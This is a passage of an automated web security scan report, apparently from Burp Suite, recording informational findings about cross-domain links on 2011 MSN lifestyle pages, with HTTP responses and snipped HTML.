http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Lion+Tacos+removed+from+menu&go=&form=msnpop
http://www.bing.com/search?q=Taco+Bell+35%25+beef&form=msnpop
http://www.bing.com/search?q=Taco+bell+fights+back&go=&form=msnpop
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=healthy+food+at+taco+bell%3F&go=&form=msnpop
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=mcdonald+beef+lawsuit+%2410+million+settlement&go=&form=msnpop
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=taco+bell+%22thank+you+for+suing+us%22&form=msnpop
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=Taco+Bell+%22OF+COURSE+WE+USE+REAL+BEEF!%22+Youtube&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406682&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTaco-Bell-fights-back.aspx%3Fcp-documentid%3D27449852&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a614ebfb7c224f3bb457b79ccdc881e7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=03724E8B3D5544EBB79EE2D27DF917E5; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:02 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406682&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTaco-Bell-fights-back.aspx%3Fcp-documentid%3D27449852&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Taco+bell+fights+back&go=&form=msnpop"><strong>
...[SNIP]...
<div>Taco Bell is a target of a class action lawsuit aimed at the chain...s beef product. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Taco+Bell+35%25+beef&form=msnpop">What...s at issue</a>? To combat the allegations, the chain has taken out full page ads in some of the nation...s biggest newspapers (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=taco+bell+%22thank+you+for+suing+us%22&form=msnpop">what does it say</a>?) and has released a YouTube video to explain its product. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=Taco+Bell+%22OF+COURSE+WE+USE+REAL+BEEF!%22+Youtube&FORM=msnpop">See the video</a>
...[SNIP]...
<div>A restaurant recently got attention when it said it...d serve lion tacos. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Lion+Tacos+removed+from+menu&go=&form=msnpop">Get the latest</a>
...[SNIP]...
<div>In 2002 McDonald's was sued over beef in their French fries. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mcdonald+beef+lawsuit+%2410+million+settlement&go=&form=msnpop">How much was the settlement</a>
...[SNIP]...
<div>Is it possible to eat healthy at Taco Bell? It is. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=healthy+food+at+taco+bell%3F&go=&form=msnpop">Find out how</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.331. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Taco-Bell-fights-back.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx?cp-documentid=27449852

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Lion+Tacos+removed+from+menu&go=&form=msnpop
http://www.bing.com/search?q=Taco+Bell+35%25+beef&form=msnpop
http://www.bing.com/search?q=Taco+bell+fights+back&go=&form=msnpop
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=healthy+food+at+taco+bell%3F&go=&form=msnpop
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=mcdonald+beef+lawsuit+%2410+million+settlement&go=&form=msnpop
http://www.bing.com/search?q=taco+bell+%22thank+you+for+suing+us%22&form=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=Taco+Bell+%22OF+COURSE+WE+USE+REAL+BEEF!%22+Youtube&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345062&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTaco-Bell-fights-back.aspx%3Fcp-documentid%3D27449852&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=603578c5dd754321a5d5f718e6e3719e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0F1C39FCE6A54EAF8026C0BE98EE9363; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:02 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345062&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTaco-Bell-fights-back.aspx%3Fcp-documentid%3D27449852&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Taco+bell+fights+back&go=&form=msnpop"><strong>
...[SNIP]...
<div>Taco Bell is a target of a class action lawsuit aimed at the chain...s beef product. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Taco+Bell+35%25+beef&form=msnpop">What...s at issue</a>? To combat the allegations, the chain has taken out full page ads in some of the nation...s biggest newspapers (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=taco+bell+%22thank+you+for+suing+us%22&form=msnpop">what does it say</a>?) and has released a YouTube video to explain its product. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=Taco+Bell+%22OF+COURSE+WE+USE+REAL+BEEF!%22+Youtube&FORM=msnpop">See the video</a>
...[SNIP]...
<div>A restaurant recently got attention when it said it...d serve lion tacos. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Lion+Tacos+removed+from+menu&go=&form=msnpop">Get the latest</a>
...[SNIP]...
<div>In 2002 McDonald's was sued over beef in their French fries. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mcdonald+beef+lawsuit+%2410+million+settlement&go=&form=msnpop">How much was the settlement</a>
...[SNIP]...
<div>Is it possible to eat healthy at Taco Bell? It is. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=healthy+food+at+taco+bell%3F&go=&form=msnpop">Find out how</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.332. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx?cp-documentid=26967180&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=avril+lavigne&qpvt=avril+lavigne&FORM=msnhal
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=avril+lavigne&form=msnhal
http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&form=msnhal
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345074&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTwitter-Death-Hoaxes-2010.aspx%3Fcp-documentid%3D26967180%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx?cp-documentid=26967180&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=afea9d1aa6b64bb89cc826008652e671; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4832BD95C2434303AACD90D820334E33; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:14 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 33298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345074&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTwitter-Death-Hoaxes-2010.aspx%3Fcp-documentid%3D26967180%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&form=msnhal"><strong>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne&form=msnhal">Avril Lavigne</a> (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=avril+lavigne&qpvt=avril+lavigne&FORM=msnhal">see photos</a>) is the first celebrity death hoax of 2011. The rocker is rumored to have died in a freak accident. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&form=msnhal">Get the details</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.333. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx?cp-documentid=26967180&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=avril+lavigne&qpvt=avril+lavigne&FORM=msnhal
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=avril+lavigne&form=msnhal
http://www.bing.com/search?q=avril+lavigne+died+snowboard+accident&form=msnhal
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406693&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTwitter-Death-Hoaxes-2010.aspx%3Fcp-documentid%3D26967180%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6109665202c646a79b6809b0b630c396; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=38D1933830BB453D86CDB94040A09991; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 33278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406693&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FTwitter-Death-Hoaxes-2010.aspx%3Fcp-documentid%3D26967180%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
